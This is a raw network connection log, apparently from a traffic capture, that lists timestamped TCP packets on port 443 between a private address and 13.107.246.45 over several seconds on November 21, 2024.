                                                                                                                                                                              Nov 21, 2024 08:32:07.444178104 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.444183111 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.446763992 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.446819067 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.446912050 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.447066069 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.447078943 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.476581097 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.476598024 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.476663113 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.476691961 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.477065086 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.477081060 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.477092028 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.477232933 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.477264881 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.477303028 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.480151892 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.480190992 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.480251074 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.480488062 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.480499029 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.619151115 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.619688034 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.619699001 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.620117903 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.620122910 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.104698896 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.104729891 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.104803085 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.104809999 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.104855061 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.105009079 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.105021954 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.105041981 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.105046034 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.108223915 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.108262062 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.108345985 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.108484983 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.108498096 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.674192905 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.674649954 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.674717903 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.675107956 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.675122976 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.936907053 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.937453985 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.937491894 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:08.937911987 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:08.937916994 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.129590988 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.129652023 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.129750967 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.129822969 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.129993916 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.130037069 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.130060911 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.130417109 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.130501032 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.130559921 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.132606030 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.132632971 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.132709980 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.132925987 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.132939100 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.214071989 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.214504004 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.214524984 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.215025902 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.215030909 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.230235100 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.230588913 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.230647087 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.231673002 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.231687069 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.387906075 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.387969017 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.388047934 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.388070107 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.391017914 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.391036034 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.391045094 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.391443968 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.391561031 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.391603947 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.393630981 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.393680096 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.393763065 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.393914938 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.393923998 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.648518085 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.648581982 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.648647070 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.648807049 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.648823977 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.648834944 CET50039443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.648842096 CET4435003913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.651279926 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.651308060 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.651381016 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.651515961 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.651530981 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.673116922 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.673172951 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.673295021 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.673490047 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.673506975 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.673518896 CET50038443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.673526049 CET4435003813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.675532103 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.675561905 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.675626993 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.675736904 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.675749063 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.952795982 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.953237057 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.953274965 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:09.953687906 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:09.953695059 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:10.405201912 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:10.405291080 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:10.405349016 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:10.405548096 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:10.405555010 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:10.405566931 CET50040443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:10.405571938 CET4435004013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:10.408049107 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:10.408082962 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:10.408173084 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:10.408304930 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:10.408322096 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:10.849337101 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:10.851217985 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:10.851217985 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:10.851248026 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:10.851258993 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.173999071 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.174482107 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.174515963 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.174922943 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.174928904 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.282982111 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.286094904 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.286218882 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.286218882 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.286241055 CET50041443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.286253929 CET4435004113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.288935900 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.288979053 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.289076090 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.289258957 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.289273977 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.501414061 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.502115965 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.502129078 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.502511024 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.502516031 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.525373936 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.526084900 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.526120901 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.526690960 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.526698112 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.657375097 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.657418966 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.657485962 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.657507896 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.657525063 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.657571077 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.657994986 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.658016920 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.658027887 CET50042443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.658035994 CET4435004213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.661575079 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.661628008 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.661704063 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.661922932 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.661943913 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.966988087 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.967068911 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.967139006 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.967149019 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.967231989 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.967284918 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.967569113 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.967581987 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.967964888 CET50043443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.967972040 CET4435004313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.971097946 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.971147060 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:11.971365929 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.971525908 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:11.971543074 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.037322998 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.037355900 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.037375927 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.037412882 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.037446976 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.037467003 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.037487984 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.193231106 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.193316936 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.193330050 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.193761110 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.193981886 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.194005013 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.194016933 CET50044443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.194022894 CET4435004413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.233834028 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.233871937 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.234009027 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.235342026 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.235352993 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.331089020 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.331962109 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.331985950 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.332463026 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.332468987 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.774818897 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.774851084 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.774904013 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.774925947 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.775156975 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.775166988 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.775185108 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.775383949 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.775429964 CET4435004513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.775471926 CET50045443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.777765036 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.777795076 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:12.777909994 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.778078079 CET50050443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:12.778089046 CET4435005013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.005711079 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.010288000 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.010308981 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.010911942 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.010916948 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.462992907 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.463624954 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.463650942 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.464222908 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.464230061 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.488742113 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.488781929 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.488838911 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.488919973 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.488941908 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.488951921 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.488986015 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.661533117 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.661591053 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.661624908 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.661644936 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.661654949 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.661660910 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.661681890 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.661708117 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.661796093 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.661815882 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.661824942 CET50046443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.661829948 CET4435004613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.664585114 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.664622068 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.664726973 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.664880037 CET50051443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.664887905 CET4435005113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.692862034 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.693520069 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.693559885 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.694109917 CET50048443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.694120884 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.912748098 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.912828922 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.912919044 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.912951946 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.912997007 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.913162947 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.913170099 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.913191080 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.913556099 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.913633108 CET4435004713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.913705111 CET50047443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.916290998 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.916340113 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:13.916409016 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.916589022 CET50052443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:13.916604042 CET4435005213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.019941092 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.020468950 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.020483971 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.021085978 CET50049443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:14.021091938 CET4435004913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.131676912 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.131711006 CET4435004813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:14.131782055 CET50048443192.168.2.613.107.246.45
